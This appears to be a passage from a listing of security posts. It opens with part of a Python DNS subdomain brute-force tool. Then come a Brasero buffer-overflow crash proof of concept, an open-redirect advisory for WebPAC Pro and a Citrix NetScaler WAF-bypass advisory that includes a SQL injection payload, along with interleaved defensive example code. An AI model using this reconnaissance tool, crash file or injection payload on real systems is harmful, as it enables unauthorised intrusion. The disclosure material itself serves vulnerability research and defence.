'redhat', 'ref', 'reference', 'reg', 'register', 'registro', 'registry', 'regs', 'relay', 'release', 'rem', 'remote', 'remstats', 'report', 'reports', 'research', 'reseller', 'reserved', 'resumenes', 'rho', 'rhodeisland', 'ri', 'ris', 'rmi', 'ro', 'robert', 'romeo', 'root', 'rose', 'route', 'router', 'router1', 'rs', 'rss', 'rtelnet', 'rtr', 'rtr01', 'rtr1', 'ru', 'rune', 'rw', 'rwhois', 's', 's1', 's2', 'sa', 'sac', 'sacramento', 'sadmin', 'safe', 'sales', 'saltlake', 'sam', 'san', 'sanantonio', 'sandiego', 'sanfrancisco', 'sanjose', 'saskatchewan', 'saturn', 'sb', 'sbs', 'sc', 'scanner', 'schedules', 'scotland', 'scotty', 'sd', 'se', 'search', 'seattle', 'sec', 'secret', 'secure', 'secured', 'securid', 'security', 'sendmail', 'seri', 'serv', 'serv2', 'server', 'server1', 'servers', 'service', 'services', 'servicio', 'servidor', 'setup', 'sg', 'sh', 'share', 'shared', 'sharepoint', 'shares', 'shareware', 'shipping', 'shop', 'shoppers', 'shopping', 'si', 'siebel', 'sierra', 'sigma', 'signin', 'signup', 'silver', 'sim', 'sirius', 'site', 'sj', 'sk', 'skywalker', 'sl', 'slackware', 'slmail', 'sm', 'smc', 'sms', 'smtp', 'smtphost', 'sn', 'sniffer', 'snmp', 'snmpd', 'snoopy', 'snort', 'so', 'socal', 'software', 'sol', 'solaris', 'solutions', 'soporte', 'source', 'sourcecode', 'sourcesafe', 'south', 'southcarolina', 'southdakota', 'southeast', 'southwest', 'spain', 'spam', 'spider', 'spiderman', 'splunk', 'spock', 'spokane', 'springfield', 'sprint', 'sqa', 'sql', 'sql0', 'sql01', 'sql1', 'sql7', 'sqlserver', 'squid', 'squirrel', 'squirrelmail', 'sr', 'srv', 'ss', 'ssh', 'ssl', 'ssl0', 'ssl01', 'ssl1', 'st', 'staff', 'stage', 'stage1', 'staging', 'start', 'stat', 'static', 'statistics', 'stats', 'stlouis', 'stock', 'storage', 'store', 'storefront', 'streaming', 'stronghold', 'strongmail', 'studio', 'submit', 'subversion', 'sun', 'sun0', 'sun01', 'sun02', 'sun1', 'sun2', 'superman', 'supplier', 'suppliers', 'support', 'sv', 'svn', 'sw', 'sw0', 'sw01', 'sw1', 'sweden', 
'switch', 'switzerland', 'sy', 'sybase', 'sydney', 'sysadmin', 'sysback', 'syslog', 'syslogs', 'system', 'sz', 't', 'tacoma', 'taiwan', 'talk', 'tampa', 'tango', 'tau', 'tc', 'tcl', 'td', 'team', 'tech', 'technology', 'techsupport', 'telephone', 'telephony', 'telnet', 'temp', 'tennessee', 'terminal', 'terminalserver', 'termserv', 'test', 'test2k', 'testbed', 'testing', 'testlab', 'testlinux', 'tests', 'testserver', 'testsite', 'testsql', 'testxp', 'texas', 'tf', 'tftp', 'tg', 'th', 'thailand', 'theta', 'thor', 'tienda', 'tiger', 'time', 'titan', 'tivoli', 'tj', 'tk', 'tm', 'tn', 'to', 'tokyo', 'toledo', 'tom', 'tool', 'tools', 'toplayer', 'toronto', 'tour', 'tp', 'tr', 'tracker', 'train', 'training', 'transfers', 'trinidad', 'trinity', 'ts', 'ts1', 'tt', 'tucson', 'tulsa', 'tunnel', 'tv', 'tw', 'tx', 'tz', 'u', 'ua', 'uddi', 'ug', 'uk', 'um', 'uniform', 'union', 'unitedkingdom', 'unitedstates', 'unix', 'unixware', 'update', 'updates', 'upload', 'uploads', 'ups', 'upsilon', 'uranus', 'urchin', 'us', 'usa', 'usenet', 'user', 'users', 'ut', 'utah', 'utilities', 'uy', 'uz', 'v', 'va', 'vader', 'vantive', 'vault', 'vc', 've', 'vega', 'vegas', 'vend', 'vendors', 'venus', 'vermont', 'vg', 'vi', 'victor', 'video', 'videos', 'viking', 'violet', 'vip', 'virginia', 'virtual', 'vista', 'vm', 'vmserver', 'vmware', 'vn', 'vnc', 'voice', 'voicemail', 'voip', 'voyager', 'vpn', 'vpn0', 'vpn01', 'vpn02', 'vpn1', 'vpn2', 'vt', 'vu', 'vz', 'w', 'w1', 'w2', 'w3', 'wa', 'wais', 'wallet', 'wam', 'wan', 'wap', 'warehouse', 'washington', 'wc3', 'web', 'webaccess', 'webadmin', 'webalizer', 'webboard', 'webcache', 'webcam', 'webcast', 'webdev', 'webdocs', 'webfarm', 'webhelp', 'weblib', 'weblogic', 'webmail', 'webmaster', 'webmin', 'webproxy', 'webring', 'webs', 'webserv', 'webserver', 'webservices', 'webshop', 'website', 'websites', 'websphere', 'websrv', 'websrvr', 'webstats', 'webstore', 'websvr', 'webtrends', 'welcome', 'west', 'westvirginia', 'wf', 'whiskey', 'white', 'whois', 'wi', 
'wichita', 'wiki', 'wililiam', 'win', 'win01', 'win02', 'win1', 'win2', 'win2000', 'win2003', 'win2k', 'win2k3', 'windows', 'windows01', 'windows02', 'windows1', 'windows2', 'windows2000', 'windows2003', 'windowsxp', 'wingate', 'winnt', 'winproxy', 'wins', 'winserve', 'winxp', 'wire', 'wireless', 'wisconsin', 'wlan', 'wordpress', 'work', 'workstation', 'world', 'wpad', 'write', 'ws', 'ws1', 'ws10', 'ws11', 'ws12', 'ws13', 'ws2', 'ws3', 'ws4', 'ws5', 'ws6', 'ws7', 'ws8', 'ws9', 'wusage', 'wv', 'ww', 'www', 'www-', 'www-01', 'www-02', 'www-1', 'www-2', 'www-int', 'www0', 'www01', 'www02', 'www1', 'www2', 'www3', 'wwwchat', 'wwwdev', 'wwwmail', 'wy', 'wyoming', 'x', 'x-ray', 'xi', 'xlogan', 'xmail', 'xml', 'xp', 'y', 'yankee', 'ye', 'yellow', 'young', 'yt', 'yu', 'z', 'z-log', 'za', 'zebra', 'zera', 'zeus', 'zlog', 'zm', 'zulu', 'zw' ]


def usage():
    print('\n' + USAGE)
    sys.exit()


def check_usage():
    if len(sys.argv) == 1:
        print('[!] WARNING: use -H for help and usage')
        sys.exit()


def get_default_nameserver():
    # first 'nameserver' entry of /etc/resolv.conf; comment lines (';', '#') are skipped
    print('[+] getting default nameserver')
    lines = list(open('/etc/resolv.conf', 'r'))
    for line in lines:
        line = line.strip()
        if not line or line[0] == ';' or line[0] == '#':
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        if fields[0] == 'nameserver':
            defaults['nameserver'] = fields[1]
            break
    return defaults


def get_default_source_ip():
    print('[+] getting default ip address')
    try:
        # get currently used iface by establishing a temp socket (UDP connect sends no packet)
        ipsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        ipsocket.connect(("gmail.com", 80))
        defaults['ipaddr'] = ipsocket.getsockname()[0]
        print('[+] found currently used interface ip ' + "'" + defaults['ipaddr'] + "'")
        ipsocket.close()
    except:
        print('''[!]
WARNING: can\'t get your ip-address, use "-i" option and define yourself''')
    return defaults


def parse_cmdline():
    p = argparse.ArgumentParser(usage=USAGE, add_help=False)
    p.add_argument('-t', metavar='<type>', dest='type',
                   help='attack type (0 for dictionary 1 for bruteforce)')
    p.add_argument('-a', metavar='<domain>', dest='domain',
                   help='subdomain to bruteforce')
    p.add_argument('-l', metavar='<wordlist>', dest='wordlist',
                   help='wordlist, one hostname per line (default: predefined in code)')
    p.add_argument('-d', metavar='<nameserver>', dest='dnshost',
                   help="choose another nameserver (default: your system's)")
    p.add_argument('-i', metavar='<ipaddr>', dest='ipaddr',
                   help="source ip address to use (default: your system's)")
    p.add_argument('-p', metavar='<port>', dest='port', default=0,
                   help='source port to use (default: 0 --> first free random port)')
    p.add_argument('-u', metavar='<protocol>', dest='protocol', default='udp',
                   help='speak via udp or tcp (default: udp)')
    p.add_argument('-c', metavar='<charset>', dest='charset', default=0,
                   help='choose charset 0 [a-z0-9], 1 [a-z] or 2 [0-9] (default: 0)')
    p.add_argument('-m', metavar='<maxchar>', dest='max', default=2,
                   help='max chars to bruteforce (default: 2)')
    p.add_argument('-s', metavar='<prefix>', dest='prefix',
                   help="prefix for bruteforce, e.g. 'www'")
    p.add_argument('-g', metavar='<postfix>', dest='postfix',
                   help="postfix for bruteforce, e.g. 'www'")
    p.add_argument('-o', metavar='<sec>', dest='timeout', default=3,
                   help='timeout (default: 3)')
    p.add_argument('-v', action='store_true', dest='verbose',
                   help='verbose mode - prints every attempt (default: quiet)')
    p.add_argument('-w', metavar='<sec>', dest='wait', default=0,
                   help='seconds to wait for next request (default: 0)')
    p.add_argument('-x', metavar='<num>', dest='threads', default=32,
                   help='number of threads to use (default: 32) - choose more ')
    p.add_argument('-r', metavar='<logfile>', dest='logfile', default='stdout',
                   help='write found subdomains to file (default: stdout)')
    p.add_argument('-V', action='version', version='%(prog)s ' + VERSION,
                   help='print version information')
    p.add_argument('-H', action='help', help='print this help')
    return p.parse_args()


def check_cmdline(opts):
    if not opts.type or not opts.domain:
        print('[-] ERROR: mount /dev/brain')
        sys.exit()


def set_opts(defaults, opts):
    if not opts.dnshost:
        opts.dnshost = defaults['nameserver']
    if not opts.ipaddr:
        opts.ipaddr = defaults['ipaddr']
    if int(opts.charset) == 0:
        opts.charset = chars + digits
    elif int(opts.charset) == 1:
        opts.charset = chars
    else:
        opts.charset = digits
    if not opts.prefix:
        opts.prefix = prefix
    if not opts.postfix:
        opts.postfix = postfix
    return opts


def read_hostnames(opts):
    print('[+] reading hostnames')
    hostnames = []
    if opts.wordlist:
        hostnames = list(open(opts.wordlist, 'r'))
        return hostnames
    else:
        return wordlist


def attack(opts, hostname, attack_pool):
    if opts.verbose:
        sys.stdout.write(' -> trying %s\n' % hostname)
        sys.stdout.flush()
    try:
        x = dns.message.make_query(hostname, 1)  # qtype 1 = A record
        if opts.protocol == 'udp':
            a = dns.query.udp(x, opts.dnshost, float(opts.timeout), 53, None,
                              opts.ipaddr, int(opts.port), True, False)
        else:
            a = dns.query.tcp(x, opts.dnshost, float(opts.timeout), 53, None,
                              opts.ipaddr, int(opts.port), False)
    except dns.exception.Timeout:
        print('[-] ERROR: time out!')
        sys.exit()
    except socket.error:
        print('''[-] ERROR: no connection? ip|srcport incorrectly defined? you can run only one thread if fixed source port specified!''')
        sys.exit()
    finally:
        # release the pool slot on every path; sys.exit() inside a worker thread only
        # ends that thread, and a leaked slot would eventually block the main loop
        attack_pool.release()
    if a.answer:
        answ = ''
        # iterate dns rrset answer (can be multiple sets) field to extract
        # detailed info (dns and ip)
        for i in a.answer:
            answ += str(i[0])
            answ += ' '
        answer = (hostname, answ)
        found.append(answer)


def str_gen(opts, hostnames):
    print('[+] generating list of strings')
    tmp_hostnames = itertools.product(opts.charset, repeat=int(opts.max))
    hostnames = list(tmp_hostnames)
    hostnames = map(''.join, hostnames)
    return hostnames


def run_threads(opts, hostname, attack_pool, threads):
    t = threading.Thread(target=attack, args=(opts, hostname, attack_pool))
    attack_pool.acquire()
    t.start()
    threads.append(t)
    return threads


def prepare_attack(opts, hostnames):
    sys.stdout.write('[+] attacking \'%s\' via ' % opts.domain)
    threads = list()
    attack_pool = threading.BoundedSemaphore(value=int(opts.threads))
    if opts.type == '0':
        sys.stdout.write('dictionary\n')
        for hostname in hostnames:
            hostname = hostname.rstrip() + '.' + opts.domain
            time.sleep(float(opts.wait))
            threads = run_threads(opts, hostname, attack_pool, threads)
        for t in threads:
            t.join()
    elif opts.type == '1':
        sys.stdout.write('bruteforce\n')
        hostnames = str_gen(opts, hostnames)
        for hostname in hostnames:
            hostname = opts.prefix + hostname + opts.postfix + '.' + opts.domain
            time.sleep(float(opts.wait))
            threads = run_threads(opts, hostname, attack_pool, threads)
        for t in threads:
            t.join()
    else:
        print('[-] ERROR: unknown attack type')
        sys.exit()


def ip_extractor(ip):
    # extract ip from string of rrset answer object
    try:
        extracted = re.findall(r'[0-9]+(?:\.[0-9]+){3}', ip)
        return extracted[0]
    except:
        print('[-] ERROR: can\'t extract ip addresses')
        sys.exit()


def analyze_results(opts, found):
    # get main domain ip
    try:
        mainhostip = socket.gethostbyname(opts.domain)
        # append domain|ip to diffound if subdomain ip differs from the starting
        # domain ip
        for domain, ip in found:
            if ip_extractor(ip) != mainhostip:
                diffound.append(domain + ' | ' + ip)
    except dns.exception.Timeout:
        sys.exit()
    except socket.error:
        print('[-] ERROR: wrong domain or no connection?')
        sys.exit()


def log_results(opts, found, diffound):
    if opts.logfile == 'stdout':
        print('---')
        if not found:
            print('no hosts found ')
        else:
            print('ANSWERED DNS REQUESTS')
            print('---')
            for f in found:
                print(f[0] + ' | ' + f[1])
        if not diffound:
            print('---')
            print('NO HOSTS WITH DIFFERENT IP FOUND ')
        else:
            print('---')
            print('ANSWERED DNS REQUEST WITH DIFFERENT IP')
            print('---')
            for domain in diffound:
                print(domain)
    else:
        print('[+] \033[0;94mlogging results to %s\033[0;m' % opts.logfile)
        with open(opts.logfile, 'w') as f:
            if found:
                f.write('---\n')
                f.write('ANSWERED DNS REQUESTS\n')
                f.write('---\n')
                for x in found:
                    f.write('domain: ' + x[0] + ' | ' + x[1] + '\n')
            if not diffound:
                f.write('---\nNO HOSTS WITH DIFFERENT IP FOUND \n')
            else:
                f.write('---\nANSWERED DNS REQUEST WITH DIFFERENT IP\n---\n')
                for domain in diffound:
                    f.write(domain + '\n')
    print('[+] game over')


def main():
    check_usage()
    opts = parse_cmdline()
    check_cmdline(opts)
    # both helpers fill the module-level 'defaults' dict in place; not rebinding
    # the name here keeps 'defaults' valid when -d and -i are both given
    if not opts.dnshost:
        get_default_nameserver()
    if not opts.ipaddr:
        get_default_source_ip()
    if opts.protocol != 'udp' and opts.protocol != 'tcp':
        print('[-] ERROR: unknown protocol')
        sys.exit(1337)
    opts = set_opts(defaults, opts)
    hostnames = read_hostnames(opts)
    prepare_attack(opts, hostnames)
    analyze_results(opts, found)
    log_results(opts, found, diffound)


if __name__ == '__main__':
    try:
        print(BANNER + '\n')
        main()
    except KeyboardInterrupt:
        print('\n[!] WARNING: aborted by user')
        raise SystemExit

# EOF
Source
  15. pyClamd is a python interface to Clamd (Clamav daemon). By using pyClamd, you can add virus detection capabilities to your python software in an efficient and easy way. Instead of pyClamav which uses libclamav, pyClamd may be used by a closed source product. Changes: This version is compatible with python 3 (tested with 3.2.3) and python 2 (tested 2.7.3). The API for this new version is now object oriented. Useful classes are ClamdNetworkSocket and ClamdUnixSocket. Download
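Added example, not pyClamd's own code: the clamd INSTREAM exchange that a wrapper such as ClamdNetworkSocket performs, written directly against the daemon's socket protocol (NUL-terminated "z" commands, length-prefixed chunks, a zero-length chunk to finish, a NUL-terminated verdict). A constructed stub clamd is included so the whole round trip runs offline; the stub flags a made-up marker string instead of real signatures, and the port/marker names are assumptions.

```python
import socket
import struct
import threading

# Constructed stand-in for a signature database: the stub daemon below flags
# any stream containing this marker. Real clamd matches its own signatures.
FAKE_SIGNATURES = {b"FAKE-MALWARE-MARKER": "Fake.Test.Signature"}


def scan_stream(data, host="127.0.0.1", port=3310, chunk_size=4096, timeout=5.0):
    """Scan bytes with clamd's INSTREAM command and return the verdict line.

    Wire format: 'zINSTREAM\\0', then chunks of 4-byte big-endian length +
    payload, then a zero-length chunk; the reply is NUL-terminated, e.g.
    'stream: OK' or 'stream: Eicar-Test-Signature FOUND'."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(b"zINSTREAM\0")
        for off in range(0, len(data), chunk_size):
            chunk = data[off:off + chunk_size]
            sock.sendall(struct.pack("!I", len(chunk)) + chunk)
        sock.sendall(struct.pack("!I", 0))  # zero-length chunk ends the stream
        reply = b""
        while not reply.endswith(b"\0"):
            part = sock.recv(4096)
            if not part:
                break
            reply += part
    return reply.rstrip(b"\0").decode("ascii", "replace")


def parse_verdict(verdict):
    """Return (infected, signature_name) from a 'stream: ...' verdict line."""
    _, _, status = verdict.partition(": ")
    if status == "OK":
        return False, None
    if status.endswith(" FOUND"):
        return True, status[:-len(" FOUND")]
    raise ValueError("unexpected clamd reply: %r" % verdict)


# --- constructed stub clamd, enough of the protocol to answer INSTREAM ---

def _recv_exact(conn, n):
    buf = b""
    while len(buf) < n:
        part = conn.recv(n - len(buf))
        if not part:
            raise ConnectionError("peer closed mid-frame")
        buf += part
    return buf


def _serve_one(conn):
    with conn:
        cmd = b""
        while not cmd.endswith(b"\0"):
            cmd += _recv_exact(conn, 1)
        if cmd != b"zINSTREAM\0":
            conn.sendall(b"UNKNOWN COMMAND\0")
            return
        body = b""
        while True:  # reassemble length-prefixed chunks until the 0-length one
            (length,) = struct.unpack("!I", _recv_exact(conn, 4))
            if length == 0:
                break
            body += _recv_exact(conn, length)
        for marker, name in FAKE_SIGNATURES.items():
            if marker in body:
                conn.sendall(b"stream: " + name.encode() + b" FOUND\0")
                return
        conn.sendall(b"stream: OK\0")


def start_fake_clamd(host="127.0.0.1"):
    """Bind an ephemeral port, serve clients in daemon threads, return the port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return port


if __name__ == "__main__":
    port = start_fake_clamd()
    print(scan_stream(b"just some bytes", port=port))
    print(scan_stream(b"A" * 100 + b"FAKE-MALWARE-MARKER" + b"B" * 100, port=port, chunk_size=64))
```

Point the client at a real clamd (TCPSocket 3310 in clamd.conf) and the same scan_stream works unchanged; the stub is only there so the framing, including a marker that straddles a chunk boundary, can be checked without a daemon.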
  16. #!/usr/bin/python
#Exploit title: Brasero 3.4.1 'm3u' Buffer Overflow POC
#Date Discovered: 15th March' 2015
# Exploit Author: Avinash Kumar Thapa "-Acid"
# Vulnerable Software: Brasero 3.4.1 CD/DVD for the Gnome Desktop
# Homepage:https://wiki.gnome.org/Apps/Brasero
# Tested on: Kali Linux 1.0.9

buffer = "A"*26109
buffer += "CCCC"
buffer += "D"*10500

file = "crash.m3u"
f = open(file, "w")
f.write(buffer)
f.close()

# After running the exploit, open the malicious file with the Brasero CD/DVD burner and check the crash, which leads to being logged out of your current session.

#####################################################################
# -Acid                                                             #
#####################################################################
Source
  17. Innovative WebPAC Pro 2.0 Unvalidated Redirects and Forwards (URL Redirection) Security Vulnerabilities

Exploit Title: Innovative WebPAC Pro 2.0 /showres url parameter URL Redirection Security Vulnerabilities
Vendor: Innovative Interfaces Inc
Product: WebPAC Pro
Vulnerable Versions: 2.0
Tested Version: 2.0
Advisory Publication: March 14, 2015
Latest Update: March 14, 2015
Vulnerability Type: URL Redirection to Untrusted Site ('Open Redirect') [CWE-601]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 5.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:N)
Impact Subscore: 4.9
Exploitability Subscore: 8.6
Discoverer and Author: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]

Suggestion Details:

(1) Vendor & Product Description:

Vendor: Innovative Interfaces Inc

Product & Version: WebPAC Pro 2.0

Vendor URL & Download: WebPAC Pro can be got from here,
http://www.iii.com/products/webpac_pro.shtml
http://lj.libraryjournal.com/2005/12/ljarchives/innovative-releasing-webpac-pro/

Libraries that have installed WebPac Pro:
https://wiki.library.oregonstate.edu/confluence/display/WebOPAC/Libraries+that+have+installed+WebPac+Pro

Product Introduction Overview:
"Today, some libraries want to enhance their online presence in ways that go beyond the traditional OPAC and the "library portal" model to better integrate the latest Web functionality. With WebPAC Pro, libraries will be able to take advantage of the latest Web technologies and engage Web-savvy users more effectively than ever before. WebPAC Pro is a complete update of the Web OPAC interface"

"WebPAC Pro breaks through the functional and design limitations of the traditional online catalog. Its solid technology framework supports tools for patron access such as Spell Check; integrated Really Simple Syndication (RSS) feeds; a suite of products for seamless Campus Computing; and deep control over information content and presentation with Cascading Style Sheets (CSS). WebPAC Pro is also a platform for participation when integrated with Innovative's Patron Ratings features and Community Reviews product. What's more, with WebPAC Pro's RightResult™ search technology, the most relevant materials display at the top so patrons get to the specific items or topics they want to explore immediately. WebPAC Pro can also interconnect with Innovative's discovery services platform, Encore. And for elegant access through Blackberry® Storm™ or iPhone™, the AirPAC provides catalog searching, item requesting, and more."

(2) Vulnerability Details:

The WebPAC Pro web application has a security bug. It can be exploited by Unvalidated Redirects and Forwards (URL Redirection) attacks. This could allow a user to create a specially crafted URL that, if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appears to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.

Other Innovative Interfaces products' vulnerabilities have been found by other bug hunters and researchers before. Innovative has patched some of them. NVD is the U.S. government repository of standards based vulnerability management data (this data enables automation of vulnerability management, security measurement, and compliance, e.g. FISMA). It has published suggestions, advisories and solutions related to Innovative vulnerabilities.

(2.1) The first code programming flaw occurs at the "showres?" page with the "&url" parameter.

References:
http://tetraph.com/security/open-redirect/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/innovative-webpac-pro-20-unvalidated.html
http://www.inzeed.com/kaleidoscope/computer-web-security/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
https://infoswift.wordpress.com/2015/03/14/innovative-webpac-pro-2-0-unvalidated-redirects-and-forwards-url-redirection-security-vulnerabilities/
http://marc.info/?l=full-disclosure&m=142527148510581&w=4
http://en.hackdig.com/wap/?id=17054

--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://twitter.com/tetraphibious
Source
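Added example, not part of the advisory and not WebPAC Pro code: the validation a "url" redirect parameter such as the one above needs before it is handed to the redirect. It goes beyond the single reported case and covers the bypass shapes that usually survive a naive "starts with /" or "contains our domain" check: scheme-relative "//host" and "///host", backslash-as-slash, "http:host" without slashes, userinfo tricks like "ours@evil", lookalike suffix hosts, non-http schemes, and tab/newline padding. The allowlisted host is a constructed placeholder.

```python
from urllib.parse import urlsplit

# Constructed allowlist of hosts the catalogue may redirect users to.
ALLOWED_HOSTS = {"catalog.example.edu"}

# Browsers drop leading/trailing C0 controls and spaces before parsing a URL.
_LEADING_TRAILING = "".join(chr(c) for c in range(0x21))


def safe_redirect_target(candidate, allowed_hosts=ALLOWED_HOSTS, fallback="/"):
    """Return candidate if it stays on this site (a local absolute path or an
    http(s) URL to an allowlisted host); otherwise return fallback.

    The checks mirror what a browser's URL parser will do with the string, so
    the decision is made on the URL the user agent will actually follow."""
    if not candidate:
        return fallback
    # Tab, CR and LF are ignored anywhere in a URL by browsers; remove them
    # first so "java\tscript:" or "\t//evil" are judged in their effective form.
    url = "".join(ch for ch in candidate if ch not in "\t\r\n")
    url = url.strip(_LEADING_TRAILING)
    # In the authority part of http(s) URLs a backslash is treated as a slash,
    # so "/\evil.example" means "//evil.example" to the browser.
    url = url.replace("\\", "/")
    # Scheme-relative forms ("//host", "///host", ...) always leave the site.
    if url.startswith("//"):
        return fallback
    parts = urlsplit(url)
    if parts.scheme:
        # Absolute URL: only http(s), and only to an allowlisted host. Match on
        # the parsed hostname so "allowed@evil" (userinfo) and
        # "allowed.evil.example" (suffix) are both rejected; "http:evil" has
        # no authority at all and is rejected the same way.
        if parts.scheme.lower() not in ("http", "https"):
            return fallback
        host = (parts.hostname or "").lower()
        if host not in allowed_hosts:
            return fallback
        return url
    # No scheme: accept only a site-absolute path. Relative paths are refused
    # rather than resolved, which keeps the function independent of the
    # current page's location.
    if not url.startswith("/"):
        return fallback
    return url
```

Using the value returned by this function as the Location header, instead of the raw parameter, is the whole fix; anything that does not come back unchanged lands on the fallback page.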
  18. Document Title:
============
Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution

Release Date:
===========
12 Mar 2015

Product & Service Introduction:
========================
Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications.

Abstract Advisory Information:
=======================
BGA Security Team discovered an HTTP Header Pollution vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable).

Vulnerability Disclosure Timeline:
=========================
2 Feb 2015 Bug reported to the vendor.
4 Feb 2015 Vendor returned with a case ID.
5 Feb 2015 Detailed info/config given.
12 Feb 2015 Asked about the case.
16 Feb 2015 Vendor returned "investigating ..."
6 Mar 2015 Asked about the case.
6 Mar 2015 Vendor has validated the issue.
12 Mar 2015 There isn't any fix addressing the issue.

Discovery Status:
=============
Published

Affected Product(s):
===============
Citrix Systems, Inc.
Product: Citrix Netscaler NS10.5 (other versions may be vulnerable)

Exploitation Technique:
==================
Remote, Unauthenticated

Severity Level:
===========
High

Technical Details & Description:
========================
It is possible to bypass the Netscaler WAF using a method which may be called HTTP Header Pollution.

The setup:
- An Apache web server with default configuration on Windows (XAMPP).
- A SOAP web service written in PHP and vulnerable to SQL injection.
- Netscaler WAF with SQL injection rules.

First request: ' union select current_user,2#
- Netscaler blocks it.

Second request: The same content and an additional HTTP header, "Content-Type: application/octet-stream".
- It bypasses the WAF but the web server misinterprets it.

Third request: The same content and two additional HTTP headers, "Content-Type: application/octet-stream" and "Content-Type: text/xml", in that order.
- The request is able to bypass the WAF and the web server runs it.

Proof of Concept (PoC):
==================
Proof of Concept Request:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <string>' union select current_user, 2#</string>
   </soapenv:Body>
</soapenv:Envelope>

Response:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <soap:Body>
      <return xsi:type="xsd:string">
         Name: root@localhost
      </return>
   </soap:Body>
</soap:Envelope>

Solution Fix & Patch:
================
12 Mar 2015 There isn't any fix addressing the issue.

Security Risk:
==========
The risk of the vulnerability above is estimated as high.

Credits & Authors:
==============
BGA Bilgi Güvenliği - Onur ALANBEL

Disclaimer & Information:
===================
The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi@bga.com.tr

Copyright © 2015 | BGA
Source
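Added example, not BGA's code and not a NetScaler internal: a model of why the three requests above behave differently. The advisory does not say what the appliance does internally, so the split modelled here (a filter that trusts the first Content-Type and skips body inspection for types it cannot parse, a PHP SOAP backend that uses the last Content-Type) is an assumption consistent with the observed results. The SQLi signature, the SOAP extraction and the "hardened" filter are constructed for the example; the hardened rule is the one a practitioner wants: refuse requests that repeat a singleton header, and inspect the body regardless of what the client claims it is.

```python
import re

SQLI_PATTERN = re.compile(rb"(?i)\bunion\s+select\b")   # toy signature, one rule only
INSPECTED_TYPES = {"text/xml", "application/xml", "application/x-www-form-urlencoded"}
XML_TYPES = {"text/xml", "application/xml"}


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, [(name, value)], body).
    Header names are lower-cased; duplicates are kept in wire order."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.decode("latin-1").partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0].decode("latin-1"), headers, body


def header_values(headers, name):
    return [v for n, v in headers if n == name]


def media_type(value):
    return value.split(";")[0].strip().lower()


def waf_decision(raw):
    """Model of the bypassed filter: trusts the FIRST Content-Type and only
    inspects bodies whose type it knows how to parse. Returns 'block'/'pass'."""
    _, headers, body = parse_request(raw)
    ctypes = header_values(headers, "content-type")
    media = media_type(ctypes[0]) if ctypes else ""
    if media in INSPECTED_TYPES and SQLI_PATTERN.search(body):
        return "block"
    return "pass"


def backend_decision(raw):
    """Model of the PHP SOAP backend: uses the LAST Content-Type and parses
    the <string> element only when the body is declared as XML. Returns the
    value the SQL layer would receive, or None when the body is not parsed."""
    _, headers, body = parse_request(raw)
    ctypes = header_values(headers, "content-type")
    media = media_type(ctypes[-1]) if ctypes else ""
    if media not in XML_TYPES:
        return None
    m = re.search(rb"<string>(.*?)</string>", body, re.S)
    return m.group(1).decode("latin-1") if m else None


def hardened_waf_decision(raw):
    """Do not guess which of two conflicting framings the backend will pick:
    refuse repeated singleton headers, and inspect every body."""
    _, headers, body = parse_request(raw)
    if len(header_values(headers, "content-type")) > 1:
        return "block"
    if SQLI_PATTERN.search(body):
        return "block"
    return "pass"


def build_request(content_types):
    """The advisory's SOAP payload with the given Content-Type headers, in order."""
    body = (b'<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" '
            b'xmlns:tem="http://tempuri.org/"><soapenv:Header/><soapenv:Body>'
            b"<string>' union select current_user, 2#</string>"
            b"</soapenv:Body></soapenv:Envelope>")
    head = b"POST /service.php HTTP/1.1\r\nHost: target.example\r\n"
    for ct in content_types:
        head += b"Content-Type: " + ct.encode("ascii") + b"\r\n"
    head += b"Content-Length: %d\r\n" % len(body)
    return head + b"\r\n" + body


if __name__ == "__main__":
    for cts in (["text/xml"], ["application/octet-stream"],
                ["application/octet-stream", "text/xml"]):
        r = build_request(cts)
        print(cts, "waf:", waf_decision(r), "backend:", backend_decision(r),
              "hardened:", hardened_waf_decision(r))
```

Run it and the third request is the only one that both passes the modelled filter and reaches the SQL layer, matching the advisory's sequence; the hardened rule blocks all three.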
